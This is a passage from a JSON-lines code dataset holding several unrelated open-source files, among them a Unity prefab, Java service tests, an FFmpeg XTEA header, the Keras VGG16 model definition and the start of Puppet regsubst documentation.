{fileID: 22490904}\n m_RootOrder: 2\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0, y: 0}\n m_AnchorMax: {x: 1, y: 1}\n m_AnchoredPosition: {x: 0, y: 2}\n m_SizeDelta: {x: -26.100006, y: 20}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!224 &22490904\nRectTransform:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_LocalRotation: {x: 0, y: 0, z: 0, w: 1}\n m_LocalPosition: {x: 0, y: 0, z: 0}\n m_LocalScale: {x: 1, y: 1, z: 1}\n m_Children:\n - {fileID: 22438182}\n - {fileID: 22443340}\n - {fileID: 22471362}\n m_Father: {fileID: 0}\n m_RootOrder: 0\n m_LocalEulerAnglesHint: {x: 0, y: 0, z: 0}\n m_AnchorMin: {x: 0.5, y: 0.5}\n m_AnchorMax: {x: 0.5, y: 0.5}\n m_AnchoredPosition: {x: 0, y: -60}\n m_SizeDelta: {x: 400, y: 60}\n m_Pivot: {x: 0.5, y: 0.5}\n--- !u!1001 &100100000\nPrefab:\n m_ObjectHideFlags: 1\n serializedVersion: 2\n m_Modification:\n m_TransformParent: {fileID: 0}\n m_Modifications: []\n m_RemovedComponents: []\n m_ParentPrefab: {fileID: 0}\n m_RootGameObject: {fileID: 134108}\n m_IsPrefabParent: 1\n"} {"text": "#region Copyright \n// Copyright 2017 Gigya Inc. All rights reserved.\n// \n// Licensed under the Apache License, Version 2.0 (the \"License\"); \n// you may not use this file except in compliance with the License. \n// You may obtain a copy of the License at\n// \n// http://www.apache.org/licenses/LICENSE-2.0\n// \n// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS \"AS IS\"\n// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n// POSSIBILITY OF SUCH DAMAGE.\n#endregion\n\nusing System.Runtime.Caching;\nusing Nito.AsyncEx;\n\nnamespace Gigya.Microdot.ServiceProxy.Caching\n{\n public interface ICache\n {\n AsyncLazy GetOrAdd(string key, T value, CacheItemPolicy policy);\n void Clear();\n }\n}"} {"text": "// +build ignore\n\npackage foo\n"} {"text": "package cancel.service;\n\nimport cancel.entity.NotifyInfo;\nimport cancel.entity.Order;\nimport cancel.entity.User;\nimport edu.fudan.common.util.Response;\nimport org.junit.Assert;\nimport org.junit.Before;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\nimport org.junit.runners.JUnit4;\nimport org.mockito.InjectMocks;\nimport org.mockito.Mock;\nimport org.mockito.Mockito;\nimport org.mockito.MockitoAnnotations;\nimport org.springframework.core.ParameterizedTypeReference;\nimport org.springframework.http.*;\nimport org.springframework.web.client.RestTemplate;\n\n@RunWith(JUnit4.class)\npublic class CancelServiceImplTest {\n\n @InjectMocks\n private CancelServiceImpl cancelServiceImpl;\n\n @Mock\n private RestTemplate restTemplate;\n\n private HttpHeaders headers = new HttpHeaders();\n private HttpEntity requestEntity = new HttpEntity(headers);\n\n @Before\n public void setUp() {\n MockitoAnnotations.initMocks(this);\n }\n\n @Test\n public void testCancelOrder1() {\n //mock getOrderByIdFromOrder()\n Order order = new Order();\n order.setStatus(6);\n Response response = new Response<>(1, null, order);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.cancelOrder(\"order_id\", \"login_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testCancelOrder2() {\n //mock getOrderByIdFromOrder()\n Response response = new Response<>(0, null, null);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n //mock getOrderByIdFromOrderOther()\n Order order = new Order();\n order.setStatus(6);\n Response response2 = new Response<>(1, null, order);\n ResponseEntity> re2 = new ResponseEntity<>(response2, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re2);\n Response result = cancelServiceImpl.cancelOrder(\"order_id\", \"login_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testSendEmail() {\n NotifyInfo notifyInfo = new NotifyInfo();\n HttpEntity requestEntity2 = new HttpEntity(notifyInfo, headers);\n ResponseEntity re = new ResponseEntity<>(true, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-notification-service:17853/api/v1/notifyservice/notification/order_cancel_success\",\n HttpMethod.POST,\n requestEntity2,\n Boolean.class)).thenReturn(re);\n Boolean result = cancelServiceImpl.sendEmail(notifyInfo, headers);\n Assert.assertTrue(result);\n }\n\n @Test\n public void testCalculateRefund1() {\n //mock getOrderByIdFromOrder()\n Order order = new Order();\n order.setStatus(6);\n Response response = new Response<>(1, null, order);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.calculateRefund(\"order_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted, Refound error\", null), result);\n }\n\n @Test\n public void testCalculateRefund2() {\n //mock getOrderByIdFromOrder()\n Response response = new Response<>(0, null, null);\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-service:12031/api/v1/orderservice/order/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n //mock getOrderByIdFromOrderOther()\n Order order = new Order();\n order.setStatus(6);\n Response response2 = new Response<>(1, null, order);\n ResponseEntity> re2 = new ResponseEntity<>(response2, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-order-other-service:12032/api/v1/orderOtherService/orderOther/\" + \"order_id\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re2);\n Response result = cancelServiceImpl.calculateRefund(\"order_id\", headers);\n Assert.assertEquals(new Response<>(0, \"Order Status Cancel Not Permitted\", null), result);\n }\n\n @Test\n public void testDrawbackMoney() {\n Response response = new Response<>(1, null, null);\n ResponseEntity re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-inside-payment-service:18673/api/v1/inside_pay_service/inside_payment/drawback/\" + \"userId\" + \"/\" + \"money\",\n HttpMethod.GET,\n requestEntity,\n Response.class)).thenReturn(re);\n Boolean result = cancelServiceImpl.drawbackMoney(\"money\", \"userId\", headers);\n Assert.assertTrue(result);\n }\n\n @Test\n public void testGetAccount() {\n Response response = new Response<>();\n ResponseEntity> re = new ResponseEntity<>(response, HttpStatus.OK);\n Mockito.when(restTemplate.exchange(\n \"http://ts-user-service:12342/api/v1/userservice/users/id/\" + \"orderId\",\n HttpMethod.GET,\n requestEntity,\n new ParameterizedTypeReference>() {\n })).thenReturn(re);\n Response result = cancelServiceImpl.getAccount(\"orderId\", headers);\n Assert.assertEquals(new Response(null, null, null), result);\n }\n\n}\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.\n//\n\n#import \"NSObject-Protocol.h\"\n\n@protocol NCNotificationCenterMenu \n- (void)ncMenuDNDToggle;\n- (void)ncMenuMouseUp;\n- (void)ncMenuMouseDown;\n- (void)ncMenugetInitialState:(void (^)(_Bool))arg1;\n@end\n\n"} {"text": "/**********************************************************************************************************************\nThis file is part of the Control Toolbox (https://github.com/ethz-adrl/control-toolbox), copyright by ETH Zurich.\nLicensed under the BSD-2 license (see LICENSE file in main directory)\n**********************************************************************************************************************/\n\n#pragma once\n\n#include \"DerivativesCppadSettings.h\"\n\nnamespace ct {\nnamespace core {\n\n#ifdef CPPAD\n\n//! Jacobian using Auto-Diff Codegeneration\n/*!\n * Uses Auto-Diff code generation to compute the Jacobian \\f$ J(x_s) = \\frac{df}{dx} |_{x=x_s} \\f$ of\n * a regular vector-valued mathematical function \\f$ y = f(x) \\f$ .\n *\n * x has IN_DIM dimension and y has OUT_DIM dimension. Thus, they can be\n * scalar functions (IN_DIM = 1, OUT_DIM = 1), fixed or variable size\n * (IN_DIM = -1, OUT_DIM = -1) functions.\n *\n * \\note In fact, this class is called Jacobian but computes also zero order derivatives\n *\n * @tparam IN_DIM Input dimensionality of the function (use Eigen::Dynamic (-1) for dynamic size)\n * @tparam OUT_DIM Output dimensionailty of the function (use Eigen::Dynamic (-1) for dynamic size)\n */\ntemplate \nclass DerivativesCppad : public Derivatives // double on purpose!\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n typedef ADScalar AD_SCALAR;\n\n typedef Eigen::Matrix IN_TYPE_AD; //!< function input vector type\n typedef Eigen::Matrix OUT_TYPE_AD; //!< function output vector type\n\n typedef Eigen::Matrix IN_TYPE_D; //!< function input vector type double\n typedef Eigen::Matrix OUT_TYPE_D; //!< function output vector type\n typedef Eigen::Matrix JAC_TYPE_D; //!< Jacobian type\n typedef Eigen::Matrix\n JAC_TYPE_ROW_MAJOR; //!< Jocobian type in row-major format\n typedef Eigen::Matrix HES_TYPE_D;\n typedef Eigen::Matrix HES_TYPE_ROW_MAJOR;\n\n typedef std::function FUN_TYPE_AD;\n\n typedef Derivatives DerivativesBase;\n\n\n /**\n * @brief Constructs the derivatives for autodiff without\n * codegeneration using a FUN_TYPE_AD function\n *\n * @warning If IN_DIM and/our OUT_DIM are set to dynamic (-1), then the\n * actual dimensions of x and y have to be passed here.\n *\n * @param f The function to be autodiffed\n * @param[in] inputDim inputDim input dimension, must be specified if\n * template parameter IN_DIM is -1 (dynamic)\n * @param[in] outputDim outputDim output dimension, must be specified if\n * template parameter IN_DIM is -1 (dynamic)\n */\n DerivativesCppad(FUN_TYPE_AD& f, int inputDim = IN_DIM, int outputDim = OUT_DIM)\n : DerivativesBase(), adStdFun_(f), inputDim_(inputDim), outputDim_(outputDim)\n {\n update(f, inputDim, outputDim);\n }\n\n //! copy constructor\n DerivativesCppad(const DerivativesCppad& arg)\n : DerivativesBase(arg), adStdFun_(arg.adStdFun_), inputDim_(arg.inputDim_), outputDim_(arg.outputDim_)\n {\n adCppadFun_ = arg.adCppadFun_;\n }\n\n\n //! update the Jacobian with a new function\n /*!\n * \\warning If IN_DIM and/our OUT_DIM are set to dynamic (-1), then the actual dimensions of\n * x and y have to be passed here.\n *\n * @param f new function to compute Jacobian of\n * @param inputDim input dimension, must be specified if template parameter IN_DIM is -1 (dynamic)\n * @param outputDim output dimension, must be specified if template parameter IN_DIM is -1 (dynamic)\n */\n void update(FUN_TYPE_AD& f, const size_t inputDim = IN_DIM, const size_t outputDim = OUT_DIM)\n {\n adStdFun_ = f;\n outputDim_ = outputDim;\n inputDim_ = inputDim;\n if (outputDim_ > 0 && inputDim_ > 0)\n recordAd();\n }\n\n //! destructor\n virtual ~DerivativesCppad() {}\n //! deep cloning of Jacobian\n DerivativesCppad* clone() const { return new DerivativesCppad(*this); }\n virtual OUT_TYPE_D forwardZero(const Eigen::VectorXd& x) { return adCppadFun_.Forward(0, x); }\n virtual JAC_TYPE_D jacobian(const Eigen::VectorXd& x)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n\n Eigen::VectorXd jac = adCppadFun_.Jacobian(x);\n\n JAC_TYPE_D out(outputDim_, x.rows());\n out = JAC_TYPE_ROW_MAJOR::Map(jac.data(), outputDim_, x.rows());\n return out;\n }\n\n virtual void sparseJacobian(const Eigen::VectorXd& x,\n Eigen::VectorXd& jac,\n Eigen::VectorXi& iRow,\n Eigen::VectorXi& jCol)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n jac = adCppadFun_.SparseJacobian(x);\n }\n\n virtual Eigen::VectorXd sparseJacobianValues(const Eigen::VectorXd& x)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n return adCppadFun_.SparseJacobian(x);\n }\n\n\n virtual HES_TYPE_D hessian(const Eigen::VectorXd& x, const Eigen::VectorXd& lambda)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n Eigen::VectorXd hessian = adCppadFun_.Hessian(x, lambda);\n HES_TYPE_D out(x.rows(), x.rows());\n out = HES_TYPE_ROW_MAJOR::Map(hessian.data(), x.rows(), x.rows());\n return out;\n }\n\n virtual void sparseHessian(const Eigen::VectorXd& x,\n const Eigen::VectorXd& lambda,\n Eigen::VectorXd& hes,\n Eigen::VectorXi& iRow,\n Eigen::VectorXi& jCol)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n hes = adCppadFun_.SparseHessian(x, lambda);\n }\n\n\n virtual Eigen::VectorXd sparseHessianValues(const Eigen::VectorXd& x, const Eigen::VectorXd& lambda)\n {\n if (outputDim_ <= 0)\n throw std::runtime_error(\"Outdim dim smaller 0; Define output dim in DerivativesCppad constructor\");\n\n return adCppadFun_.SparseHessian(x, lambda);\n }\n\nprivate:\n /**\n * @brief Records the auto-diff terms\n */\n void recordAd()\n {\n // input vector, needs to be dynamic size\n Eigen::Matrix x(inputDim_);\n\n // declare x as independent\n CppAD::Independent(x);\n\n // output vector, needs to be dynamic size\n Eigen::Matrix y(outputDim_);\n\n y = adStdFun_(x);\n\n // store operation sequence in f: x -> y and stop recording\n CppAD::ADFun fAd(x, y);\n\n fAd.optimize();\n\n std::cout << \"AD FUn recorded\" << std::endl;\n\n adCppadFun_ = fAd;\n }\n\n std::function adStdFun_;\n\n int inputDim_; //! function input dimension\n int outputDim_; //! function output dimension\n\n CppAD::ADFun adCppadFun_;\n};\n\n#endif\n\n} /* namespace core */\n} /* namespace ct */\n"} {"text": "package io.scalechain.blockchain.storage.index\n\nimport io.kotlintest.KTestJUnitRunner\nimport io.kotlintest.matchers.Matchers\nimport io.kotlintest.specs.FlatSpec\nimport io.scalechain.blockchain.proto.*\nimport io.scalechain.blockchain.proto.test.ProtoTestData\nimport io.scalechain.blockchain.script.hash\nimport io.scalechain.blockchain.storage.TransactionLocator\nimport io.scalechain.blockchain.storage.test.TestData\nimport io.scalechain.test.ShouldSpec\nimport io.scalechain.util.ListExt\nimport org.junit.runner.RunWith\n\n/**\n * Created by kangmo on 15/12/2016.\n */\ninterface TransactionDescriptorIndexTestTrait : ShouldSpec, KeyValueCommonTrait, ProtoTestData {\n var db : KeyValueDatabase\n\n fun txDesc(height : Long, outputCount:Int) : TransactionDescriptor {\n return TransactionDescriptor(\n transactionLocator = FileRecordLocator(1, RecordLocator(2,3)),\n blockHeight = height,\n outputsSpentBy = ListExt.fill( outputCount, null)\n )\n }\n\n fun addTests() {\n \"getTransactionDescriptor\" should \"return null if the descriptor was not put\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n }\n\n \"getTransactionDescriptor\" should \"return descriptor if the descriptor was put\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n\n index.putTransactionDescriptor( db, transaction3().hash(), txDesc(3,3))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe txDesc(3,3)\n }\n\n \"getTransactionDescriptor\" should \"overwrite an existing desciptor\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(2,2))\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(2,2)\n }\n\n \"getTransactionDescriptor\" should \"return null if the descriptor was deleted\" {\n val index = object : TransactionDescriptorIndex{}\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.delTransactionDescriptor( db, transaction1().hash())\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.delTransactionDescriptor( db, transaction1().hash())\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe txDesc(2,2)\n\n index.putTransactionDescriptor( db, transaction1().hash(), txDesc(1,1))\n index.putTransactionDescriptor( db, transaction2().hash(), txDesc(2,2))\n index.putTransactionDescriptor( db, transaction3().hash(), txDesc(3,3))\n index.delTransactionDescriptor( db, transaction2().hash())\n\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe txDesc(1,1)\n index.getTransactionDescriptor( db, transaction2().hash()) shouldBe null\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe txDesc(3,3)\n\n index.delTransactionDescriptor( db, transaction1().hash())\n index.getTransactionDescriptor( db, transaction1().hash()) shouldBe null\n\n index.delTransactionDescriptor( db, transaction3().hash())\n index.getTransactionDescriptor( db, transaction3().hash()) shouldBe null\n }\n }\n}\n"} {"text": "/*\n * A 32-bit implementation of the XTEA algorithm\n * Copyright (c) 2012 Samuel Pitoiset\n *\n * This file is part of FFmpeg.\n *\n * FFmpeg is free software; you can redistribute it and/or\n * modify it under the terms of the GNU Lesser General Public\n * License as published by the Free Software Foundation; either\n * version 2.1 of the License, or (at your option) any later version.\n *\n * FFmpeg is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * Lesser General Public License for more details.\n *\n * You should have received a copy of the GNU Lesser General Public\n * License along with FFmpeg; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n */\n\n#ifndef AVUTIL_XTEA_H\n#define AVUTIL_XTEA_H\n\n#include \n\n/**\n * @file\n * @brief Public header for libavutil XTEA algorithm\n * @defgroup lavu_xtea XTEA\n * @ingroup lavu_crypto\n * @{\n */\n\ntypedef struct AVXTEA {\n uint32_t key[16];\n} AVXTEA;\n\n/**\n * Initialize an AVXTEA context.\n *\n * @param ctx an AVXTEA context\n * @param key a key of 16 bytes used for encryption/decryption\n */\nvoid av_xtea_init(struct AVXTEA *ctx, const uint8_t key[16]);\n\n/**\n * Encrypt or decrypt a buffer using a previously initialized context.\n *\n * @param ctx an AVXTEA context\n * @param dst destination array, can be equal to src\n * @param src source array, can be equal to dst\n * @param count number of 8 byte blocks\n * @param iv initialization vector for CBC mode, if NULL then ECB will be used\n * @param decrypt 0 for encryption, 1 for decryption\n */\nvoid av_xtea_crypt(struct AVXTEA *ctx, uint8_t *dst, const uint8_t *src,\n int count, uint8_t *iv, int decrypt);\n\n/**\n * @}\n */\n\n#endif /* AVUTIL_XTEA_H */\n"} {"text": "\n\n\t\n\t\n\t\n"} {"text": "# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n# pylint: disable=invalid-name\n\"\"\"VGG16 model for Keras.\n\n# Reference\n\n- [Very Deep Convolutional Networks for Large-Scale Image\nRecognition](https://arxiv.org/abs/1409.1556)\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.contrib.keras.python.keras import backend as K\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import _obtain_input_shape\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import decode_predictions # pylint: disable=unused-import\nfrom tensorflow.contrib.keras.python.keras.applications.imagenet_utils import preprocess_input # pylint: disable=unused-import\nfrom tensorflow.contrib.keras.python.keras.engine.topology import get_source_inputs\nfrom tensorflow.contrib.keras.python.keras.layers import Conv2D\nfrom tensorflow.contrib.keras.python.keras.layers import Dense\nfrom tensorflow.contrib.keras.python.keras.layers import Flatten\nfrom tensorflow.contrib.keras.python.keras.layers import GlobalAveragePooling2D\nfrom tensorflow.contrib.keras.python.keras.layers import GlobalMaxPooling2D\nfrom tensorflow.contrib.keras.python.keras.layers import Input\nfrom tensorflow.contrib.keras.python.keras.layers import MaxPooling2D\nfrom tensorflow.contrib.keras.python.keras.models import Model\nfrom tensorflow.contrib.keras.python.keras.utils import layer_utils\nfrom tensorflow.contrib.keras.python.keras.utils.data_utils import get_file\n\n\nWEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'\nWEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n\ndef VGG16(include_top=True,\n weights='imagenet',\n input_tensor=None,\n input_shape=None,\n pooling=None,\n classes=1000):\n \"\"\"Instantiates the VGG16 architecture.\n\n Optionally loads weights pre-trained\n on ImageNet. Note that when using TensorFlow,\n for best performance you should set\n `image_data_format=\"channels_last\"` in your Keras config\n at ~/.keras/keras.json.\n\n The model and the weights are compatible with both\n TensorFlow and Theano. The data format\n convention used by the model is the one\n specified in your Keras config file.\n\n Arguments:\n include_top: whether to include the 3 fully-connected\n layers at the top of the network.\n weights: one of `None` (random initialization)\n or \"imagenet\" (pre-training on ImageNet).\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n input_shape: optional shape tuple, only to be specified\n if `include_top` is False (otherwise the input shape\n has to be `(224, 224, 3)` (with `channels_last` data format)\n or `(3, 224, 224)` (with `channels_first` data format).\n It should have exactly 3 inputs channels,\n and width and height should be no smaller than 48.\n E.g. `(200, 200, 3)` would be one valid value.\n pooling: Optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be\n the 4D tensor output of the\n last convolutional layer.\n - `avg` means that global average pooling\n will be applied to the output of the\n last convolutional layer, and thus\n the output of the model will be a 2D tensor.\n - `max` means that global max pooling will\n be applied.\n classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True, and\n if no `weights` argument is specified.\n\n Returns:\n A Keras model instance.\n\n Raises:\n ValueError: in case of invalid argument for `weights`,\n or invalid input shape.\n \"\"\"\n if weights not in {'imagenet', None}:\n raise ValueError('The `weights` argument should be either '\n '`None` (random initialization) or `imagenet` '\n '(pre-training on ImageNet).')\n\n if weights == 'imagenet' and include_top and classes != 1000:\n raise ValueError('If using `weights` as imagenet with `include_top`'\n ' as true, `classes` should be 1000')\n # Determine proper input shape\n input_shape = _obtain_input_shape(\n input_shape,\n default_size=224,\n min_size=48,\n data_format=K.image_data_format(),\n include_top=include_top)\n\n if input_tensor is None:\n img_input = Input(shape=input_shape)\n else:\n img_input = Input(tensor=input_tensor, shape=input_shape)\n\n # Block 1\n x = Conv2D(\n 64, (3, 3), activation='relu', padding='same',\n name='block1_conv1')(img_input)\n x = Conv2D(\n 64, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n # Block 2\n x = Conv2D(\n 128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)\n x = Conv2D(\n 128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n # Block 3\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)\n x = Conv2D(\n 256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n # Block 4\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n # Block 5\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)\n x = Conv2D(\n 512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)\n\n if include_top:\n # Classification block\n x = Flatten(name='flatten')(x)\n x = Dense(4096, activation='relu', name='fc1')(x)\n x = Dense(4096, activation='relu', name='fc2')(x)\n x = Dense(classes, activation='softmax', name='predictions')(x)\n else:\n if pooling == 'avg':\n x = GlobalAveragePooling2D()(x)\n elif pooling == 'max':\n x = GlobalMaxPooling2D()(x)\n\n # Ensure that the model takes into account\n # any potential predecessors of `input_tensor`.\n if input_tensor is not None:\n inputs = get_source_inputs(input_tensor)\n else:\n inputs = img_input\n # Create model.\n model = Model(inputs, x, name='vgg16')\n\n # load weights\n if weights == 'imagenet':\n if include_top:\n weights_path = get_file(\n 'vgg16_weights_tf_dim_ordering_tf_kernels.h5',\n WEIGHTS_PATH,\n cache_subdir='models')\n else:\n weights_path = get_file(\n 'vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',\n WEIGHTS_PATH_NO_TOP,\n cache_subdir='models')\n model.load_weights(weights_path)\n if K.backend() == 'theano':\n layer_utils.convert_all_kernels_in_model(model)\n\n if K.image_data_format() == 'channels_first':\n if include_top:\n maxpool = model.get_layer(name='block5_pool')\n shape = maxpool.output_shape[1:]\n dense = model.get_layer(name='fc1')\n layer_utils.convert_dense_weights_data_format(dense, shape,\n 'channels_first')\n return model\n"} {"text": "# Perform regexp replacement on a string or array of strings.\n#\n# @param target [String, Array[String]]\n# The string or array of strings to operate on. If an array, the replacement will be\n# performed on each of the elements in the array, and the return value will be an array.\n# @param pattern [String, Regexp, Type[Regexp]]\n# The regular expression matching the target string. If you want it anchored at the start\n# and or end of the string, you must do that with ^ and $ yourself.\n# @param replacement [String, Hash[String, String]]\n# Replacement string. Can contain backreferences to what was matched using \\\\0 (whole match),\n# \\\\1 (first set of parentheses), and so on.\n# If the second argument is a Hash, and the matched text is one of its keys, the corresponding value is the replacement string.\n# @param flags [Optional[Pattern[/^[GEIM]*$/]], Pattern[/^G?$/]]\n# Optional. String of single letter flags for how the regexp is interpreted (E, I, and M cannot be used\n# if pattern is a precompiled regexp):\n# - *E* Extended regexps\n# - *I* Ignore case in regexps\n# - *M* Multiline regexps\n# - *G* Global replacement; all occurrences of the regexp in each target string will be replaced. Without this, only the first occurrence will be replaced.\n# @param encoding [Enum['N','E','S','U']]\n# Optional. How to handle multibyte characters when compiling the regexp (must not be used when pattern is a\n# precompiled regexp). A single-character string with the following values:\n# - *N* None\n# - *E* EUC\n# - *S* SJIS\n# - *U* UTF-8\n# @return [Array[String], String] The result of the substitution. Result type is the same as for the target parameter.\n#\n# @example Get the third octet from the node's IP address:\n# $i3 = 